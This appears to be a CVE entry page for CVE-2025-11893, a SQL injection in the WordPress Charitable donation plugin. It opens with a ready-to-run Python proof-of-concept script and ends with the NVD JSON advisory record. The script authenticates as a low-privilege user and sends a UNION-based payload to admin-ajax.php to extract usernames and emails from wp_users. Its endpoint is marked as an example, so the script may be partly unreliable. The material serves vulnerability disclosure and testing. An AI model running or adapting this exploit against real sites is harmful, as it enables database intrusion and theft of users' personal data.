CVE-2025-11893

import requests import sys from urllib.parse import urlencode # CVE-2025-11893 SQL Injection PoC # Target: WordPress Charitable Plugin < 1.8.8.5 # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only def exploit_sql_injection(target_url, wp_username, wp_password, donation_id): """ Exploit SQL injection in Charitable plugin via donation_ids parameter """ # Login to WordPress login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': wp_username, 'pwd': wp_password, 'wp-submit': 'Log In', 'redirect_to': target_url } print(f"[*] Authenticating as {wp_username}...") resp = session.post(login_url, data=login_data, allow_redirects=False) if resp.status_code != 302: print("[-] Login failed") return False print("[+] Login successful") # SQL Injection payload - extract user login and email # Using UNION-based injection technique sql_payload = f"{donation_id} UNION SELECT 1,2,3,4,5,6,7,8,9,10,user_login,user_email,14,15,16,17,18,19,20 FROM wp_users--" # Target endpoint (example - actual endpoint may vary) exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'charitable_get_donations', 'donation_ids': sql_payload } print(f"[*] Sending SQL injection payload...") print(f"[Payload] {sql_payload}") try: resp = session.post(exploit_url, data=exploit_data, timeout=30) if resp.status_code == 200: print(f"[+] Request sent, check response for extracted data") print(f"[Response] {resp.text[:500]}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <wp_user> <wp_pass> <donation_id>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] password = sys.argv[3] donation_id = sys.argv[4] exploit_sql_injection(target, user, password, donation_id)

{"cve": {"id": "CVE-2025-11893", "sourceIdentifier": "[email protected]", "published": "2025-10-25T07:15:40.540", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to SQL Injection via the donation_ids parameter in all versions up to, and including, 1.8.8.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation of the vulnerability requires a paid donation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/charitable/trunk/includes/abstracts/abstract-class-charitable-query.php#L194", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3382719/charitable/trunk/includes/abstracts/abstract-class-charitable-query.php?contextall=1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46b7820c-f36d-4c7d-b326-07259786fc6a?source=cve", "source": "[email protected]"}]}}